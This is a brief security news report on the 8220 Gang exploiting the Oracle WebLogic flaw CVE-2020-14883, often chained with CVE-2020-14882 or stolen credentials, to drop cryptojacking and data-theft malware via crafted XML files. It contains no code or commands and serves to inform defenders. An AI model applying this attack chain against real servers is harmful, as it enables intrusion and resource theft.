8220 Gang, a financially-motivated Chinese threat actor known for their cryptojacking activity, has been observed by researchers to be exploiting CVE-2020-14883, a remote code execution (RCE) vulnerability in Oracle WebLogic Server. The attackers seem to be exploiting the vulnerability to infect the victims with cryptojacking malware.
CVE-2020-14883 allows remote code execution for authenticated attackers through a gadget chain. This vulnerability is frequently coupled with CVE-2020-14882, an authentication bypass flaw, or exploited in conjunction with leaked, stolen, or weak credentials.
Upon successful exploitation, the attackers proceed to download specially crafted XML files that serve as a gateway for executing malicious code, culminating in the deployment of malware such as AgentTesla, designed for data theft and cryptocurrency mining.